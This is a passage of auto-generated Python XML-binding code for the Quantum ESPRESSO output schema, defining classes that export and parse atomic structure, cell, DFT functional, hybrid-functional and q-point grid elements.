def set_bravais_index(self, bravais_index): self.bravais_index = bravais_index
def hasContent_(self):
if (
self.atomic_positions is not None or
self.wyckoff_positions is not None or
self.crystal_positions is not None or
self.cell is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_structureType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomic_structureType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_structureType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_structureType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_structureType'):
if self.nat is not None and 'nat' not in already_processed:
already_processed.add('nat')
outfile.write(' nat="%s"' % self.gds_format_integer(self.nat, input_name='nat'))
if self.alat is not None and 'alat' not in already_processed:
already_processed.add('alat')
outfile.write(' alat="%s"' % self.gds_format_double(self.alat, input_name='alat'))
if self.bravais_index is not None and 'bravais_index' not in already_processed:
already_processed.add('bravais_index')
outfile.write(' bravais_index="%s"' % self.gds_format_integer(self.bravais_index, input_name='bravais_index'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_structureType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.atomic_positions is not None:
self.atomic_positions.export(outfile, level, namespaceprefix_, name_='atomic_positions', pretty_print=pretty_print)
if self.wyckoff_positions is not None:
self.wyckoff_positions.export(outfile, level, namespaceprefix_, name_='wyckoff_positions', pretty_print=pretty_print)
if self.crystal_positions is not None:
self.crystal_positions.export(outfile, level, namespaceprefix_, name_='crystal_positions', pretty_print=pretty_print)
if self.cell is not None:
self.cell.export(outfile, level, namespaceprefix_, name_='cell', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('nat', node)
if value is not None and 'nat' not in already_processed:
already_processed.add('nat')
try:
self.nat = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nat <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('alat', node)
if value is not None and 'alat' not in already_processed:
already_processed.add('alat')
try:
self.alat = float(value)
except ValueError as exp:
raise ValueError('Bad float/double attribute (alat): %s' % exp)
value = find_attr_value_('bravais_index', node)
if value is not None and 'bravais_index' not in already_processed:
already_processed.add('bravais_index')
try:
self.bravais_index = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.bravais_index <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'atomic_positions':
obj_ = atomic_positionsType.factory()
obj_.build(child_)
self.atomic_positions = obj_
obj_.original_tagname_ = 'atomic_positions'
elif nodeName_ == 'wyckoff_positions':
obj_ = wyckoff_positionsType.factory()
obj_.build(child_)
self.wyckoff_positions = obj_
obj_.original_tagname_ = 'wyckoff_positions'
elif nodeName_ == 'crystal_positions':
obj_ = atomic_positionsType.factory()
obj_.build(child_)
self.crystal_positions = obj_
obj_.original_tagname_ = 'crystal_positions'
elif nodeName_ == 'cell':
obj_ = cellType.factory()
obj_.build(child_)
self.cell = obj_
obj_.original_tagname_ = 'cell'
# end class atomic_structureType
class atomic_positionsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, atom=None):
self.original_tagname_ = None
if atom is None:
self.atom = []
else:
self.atom = atom
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, atomic_positionsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if atomic_positionsType.subclass:
return atomic_positionsType.subclass(*args_, **kwargs_)
else:
return atomic_positionsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_atom(self): return self.atom
def set_atom(self, atom): self.atom = atom
def add_atom(self, value): self.atom.append(value)
def insert_atom_at(self, index, value): self.atom.insert(index, value)
def replace_atom_at(self, index, value): self.atom[index] = value
def hasContent_(self):
if (
self.atom
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_positionsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomic_positionsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_positionsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_positionsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_positionsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_positionsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for atom_ in self.atom:
atom_.export(outfile, level, namespaceprefix_, name_='atom', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'atom':
obj_ = atomType.factory()
obj_.build(child_)
self.atom.append(obj_)
obj_.original_tagname_ = 'atom'
# end class atomic_positionsType
class atomType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, name=None, position=None, index=None, valueOf_=None):
self.original_tagname_ = None
self.name = _cast(None, name)
self.position = _cast(None, position)
self.index = _cast(int, index)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, atomType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if atomType.subclass:
return atomType.subclass(*args_, **kwargs_)
else:
return atomType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_position(self): return self.position
def set_position(self, position): self.position = position
def get_index(self): return self.index
def set_index(self, index): self.index = index
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='atomType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomType'):
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
if self.position is not None and 'position' not in already_processed:
already_processed.add('position')
outfile.write(' position=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.position), input_name='position')), ))
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.add('name')
self.name = value
value = find_attr_value_('position', node)
if value is not None and 'position' not in already_processed:
already_processed.add('position')
self.position = value
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
try:
self.index = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.index <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class atomType
class wyckoff_positionsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, space_group=None, more_options=None, atom=None):
self.original_tagname_ = None
self.space_group = _cast(int, space_group)
self.more_options = _cast(None, more_options)
if atom is None:
self.atom = []
else:
self.atom = atom
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, wyckoff_positionsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if wyckoff_positionsType.subclass:
return wyckoff_positionsType.subclass(*args_, **kwargs_)
else:
return wyckoff_positionsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_atom(self): return self.atom
def set_atom(self, atom): self.atom = atom
def add_atom(self, value): self.atom.append(value)
def insert_atom_at(self, index, value): self.atom.insert(index, value)
def replace_atom_at(self, index, value): self.atom[index] = value
def get_space_group(self): return self.space_group
def set_space_group(self, space_group): self.space_group = space_group
def get_more_options(self): return self.more_options
def set_more_options(self, more_options): self.more_options = more_options
def hasContent_(self):
if (
self.atom
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='wyckoff_positionsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('wyckoff_positionsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='wyckoff_positionsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='wyckoff_positionsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='wyckoff_positionsType'):
if self.space_group is not None and 'space_group' not in already_processed:
already_processed.add('space_group')
outfile.write(' space_group="%s"' % self.gds_format_integer(self.space_group, input_name='space_group'))
if self.more_options is not None and 'more_options' not in already_processed:
already_processed.add('more_options')
outfile.write(' more_options=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.more_options), input_name='more_options')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='wyckoff_positionsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for atom_ in self.atom:
atom_.export(outfile, level, namespaceprefix_, name_='atom', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('space_group', node)
if value is not None and 'space_group' not in already_processed:
already_processed.add('space_group')
try:
self.space_group = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('more_options', node)
if value is not None and 'more_options' not in already_processed:
already_processed.add('more_options')
self.more_options = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'atom':
obj_ = atomType.factory()
obj_.build(child_)
self.atom.append(obj_)
obj_.original_tagname_ = 'atom'
# end class wyckoff_positionsType
class cellType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, a1=None, a2=None, a3=None):
self.original_tagname_ = None
self.a1 = a1
self.validate_d3vectorType(self.a1)
self.a2 = a2
self.validate_d3vectorType(self.a2)
self.a3 = a3
self.validate_d3vectorType(self.a3)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, cellType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if cellType.subclass:
return cellType.subclass(*args_, **kwargs_)
else:
return cellType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_a1(self): return self.a1
def set_a1(self, a1): self.a1 = a1
def get_a2(self): return self.a2
def set_a2(self, a2): self.a2 = a2
def get_a3(self): return self.a3
def set_a3(self, a3): self.a3 = a3
def validate_d3vectorType(self, value):
# Validate type d3vectorType, a restriction on double.
if value is not None and Validate_simpletypes_:
if len(str(value)) != 3:
warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
def hasContent_(self):
if (
self.a1 is not None or
self.a2 is not None or
self.a3 is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='cellType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('cellType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='cellType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='cellType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='cellType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='cellType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.a1 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:a1>%s</qes:a1>%s' % (self.gds_format_double_list(self.a1, input_name='a1'), eol_))
if self.a2 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:a2>%s</qes:a2>%s' % (self.gds_format_double_list(self.a2, input_name='a2'), eol_))
if self.a3 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:a3>%s</qes:a3>%s' % (self.gds_format_double_list(self.a3, input_name='a3'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'a1':
a1_ = child_.text
a1_ = self.gds_validate_double_list(a1_, node, 'a1')
self.a1 = a1_
# validate type d3vectorType
self.validate_d3vectorType(self.a1)
elif nodeName_ == 'a2':
a2_ = child_.text
a2_ = self.gds_validate_double_list(a2_, node, 'a2')
self.a2 = a2_
# validate type d3vectorType
self.validate_d3vectorType(self.a2)
elif nodeName_ == 'a3':
a3_ = child_.text
a3_ = self.gds_validate_double_list(a3_, node, 'a3')
self.a3 = a3_
# validate type d3vectorType
self.validate_d3vectorType(self.a3)
# end class cellType
class dftType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, functional=None, hybrid=None, dftU=None, vdW=None):
self.original_tagname_ = None
self.functional = functional
self.validate_functionalType(self.functional)
self.hybrid = hybrid
self.dftU = dftU
self.vdW = vdW
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, dftType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if dftType.subclass:
return dftType.subclass(*args_, **kwargs_)
else:
return dftType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_functional(self): return self.functional
def set_functional(self, functional): self.functional = functional
def get_hybrid(self): return self.hybrid
def set_hybrid(self, hybrid): self.hybrid = hybrid
def get_dftU(self): return self.dftU
def set_dftU(self, dftU): self.dftU = dftU
def get_vdW(self): return self.vdW
def set_vdW(self, vdW): self.vdW = vdW
def validate_functionalType(self, value):
# Validate type functionalType, a restriction on string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['PZ', 'BP', 'PBE', 'REVPBE', 'PBESOL', 'BLYP', 'OLYP', 'PW91', 'WC', 'SOGGA', 'EV93', 'B3LYP', 'GauPBE', 'PBE0', 'HSE', 'VDW-DF', 'VDW-DF-CX', 'VDW-DF-C09', 'VDW-DF-OB86', 'VDW-DF-OBK8', 'VDW-DF2', 'VDW-DF2-C09', 'VDW-DF2-B86R', 'RVV10']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on functionalType' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.functional is not None or
self.hybrid is not None or
self.dftU is not None or
self.vdW is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='dftType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('dftType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='dftType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='dftType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='dftType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='dftType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.functional is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:functional>%s</qes:functional>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.functional), input_name='functional')), eol_))
if self.hybrid is not None:
self.hybrid.export(outfile, level, namespaceprefix_, name_='hybrid', pretty_print=pretty_print)
if self.dftU is not None:
self.dftU.export(outfile, level, namespaceprefix_, name_='dftU', pretty_print=pretty_print)
if self.vdW is not None:
self.vdW.export(outfile, level, namespaceprefix_, name_='vdW', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'functional':
functional_ = child_.text
functional_ = self.gds_validate_string(functional_, node, 'functional')
self.functional = functional_
# validate type functionalType
self.validate_functionalType(self.functional)
elif nodeName_ == 'hybrid':
obj_ = hybridType.factory()
obj_.build(child_)
self.hybrid = obj_
obj_.original_tagname_ = 'hybrid'
elif nodeName_ == 'dftU':
obj_ = dftUType.factory()
obj_.build(child_)
self.dftU = obj_
obj_.original_tagname_ = 'dftU'
elif nodeName_ == 'vdW':
obj_ = vdWType.factory()
obj_.build(child_)
self.vdW = obj_
obj_.original_tagname_ = 'vdW'
# end class dftType
class hybridType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, qpoint_grid=None, ecutfock=None, exx_fraction=None, screening_parameter=None, exxdiv_treatment=None, x_gamma_extrapolation=None, ecutvcut=None):
self.original_tagname_ = None
self.qpoint_grid = qpoint_grid
self.ecutfock = ecutfock
self.exx_fraction = exx_fraction
self.screening_parameter = screening_parameter
self.exxdiv_treatment = exxdiv_treatment
self.x_gamma_extrapolation = x_gamma_extrapolation
self.ecutvcut = ecutvcut
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, hybridType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if hybridType.subclass:
return hybridType.subclass(*args_, **kwargs_)
else:
return hybridType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_qpoint_grid(self): return self.qpoint_grid
def set_qpoint_grid(self, qpoint_grid): self.qpoint_grid = qpoint_grid
def get_ecutfock(self): return self.ecutfock
def set_ecutfock(self, ecutfock): self.ecutfock = ecutfock
def get_exx_fraction(self): return self.exx_fraction
def set_exx_fraction(self, exx_fraction): self.exx_fraction = exx_fraction
def get_screening_parameter(self): return self.screening_parameter
def set_screening_parameter(self, screening_parameter): self.screening_parameter = screening_parameter
def get_exxdiv_treatment(self): return self.exxdiv_treatment
def set_exxdiv_treatment(self, exxdiv_treatment): self.exxdiv_treatment = exxdiv_treatment
def get_x_gamma_extrapolation(self): return self.x_gamma_extrapolation
def set_x_gamma_extrapolation(self, x_gamma_extrapolation): self.x_gamma_extrapolation = x_gamma_extrapolation
def get_ecutvcut(self): return self.ecutvcut
def set_ecutvcut(self, ecutvcut): self.ecutvcut = ecutvcut
def hasContent_(self):
if (
self.qpoint_grid is not None or
self.ecutfock is not None or
self.exx_fraction is not None or
self.screening_parameter is not None or
self.exxdiv_treatment is not None or
self.x_gamma_extrapolation is not None or
self.ecutvcut is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='hybridType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('hybridType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='hybridType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='hybridType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='hybridType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='hybridType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.qpoint_grid is not None:
self.qpoint_grid.export(outfile, level, namespaceprefix_, name_='qpoint_grid', pretty_print=pretty_print)
if self.ecutfock is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ecutfock>%s</qes:ecutfock>%s' % (self.gds_format_double(self.ecutfock, input_name='ecutfock'), eol_))
if self.exx_fraction is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:exx_fraction>%s</qes:exx_fraction>%s' % (self.gds_format_double(self.exx_fraction, input_name='exx_fraction'), eol_))
if self.screening_parameter is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:screening_parameter>%s</qes:screening_parameter>%s' % (self.gds_format_double(self.screening_parameter, input_name='screening_parameter'), eol_))
if self.exxdiv_treatment is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:exxdiv_treatment>%s</qes:exxdiv_treatment>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.exxdiv_treatment), input_name='exxdiv_treatment')), eol_))
if self.x_gamma_extrapolation is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:x_gamma_extrapolation>%s</qes:x_gamma_extrapolation>%s' % (self.gds_format_boolean(self.x_gamma_extrapolation, input_name='x_gamma_extrapolation'), eol_))
if self.ecutvcut is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ecutvcut>%s</qes:ecutvcut>%s' % (self.gds_format_double(self.ecutvcut, input_name='ecutvcut'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'qpoint_grid':
obj_ = qpoint_gridType.factory()
obj_.build(child_)
self.qpoint_grid = obj_
obj_.original_tagname_ = 'qpoint_grid'
elif nodeName_ == 'ecutfock' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ecutfock')
self.ecutfock = fval_
elif nodeName_ == 'exx_fraction' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'exx_fraction')
self.exx_fraction = fval_
elif nodeName_ == 'screening_parameter' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'screening_parameter')
self.screening_parameter = fval_
elif nodeName_ == 'exxdiv_treatment':
exxdiv_treatment_ = child_.text
exxdiv_treatment_ = self.gds_validate_string(exxdiv_treatment_, node, 'exxdiv_treatment')
self.exxdiv_treatment = exxdiv_treatment_
elif nodeName_ == 'x_gamma_extrapolation':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'x_gamma_extrapolation')
self.x_gamma_extrapolation = ival_
elif nodeName_ == 'ecutvcut' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ecutvcut')
self.ecutvcut = fval_
# end class hybridType
class qpoint_gridType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, nqx1=None, nqx2=None, nqx3=None, valueOf_=None):
self.original_tagname_ = None
self.nqx1 = _cast(int, nqx1)
self.nqx2 = _cast(int, nqx2)
self.nqx3 = _cast(int, nqx3)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, qpoint_gridType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if qpoint_gridType.subclass:
return qpoint_gridType.subclass(*args_, **kwargs_)
else:
return qpoint_gridType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_nqx1(self): return self.nqx1
def set_nqx1(self, nqx1): self.nqx1 = nqx1
def get_nqx2(self): return self.nqx2
def set_nqx2(self, nqx2): self.nqx2 = nqx2
def get_nqx3(self): return self.nqx3
def set_nqx3(self, nqx3): self.nqx3 = nqx3
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='qpoint_gridType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
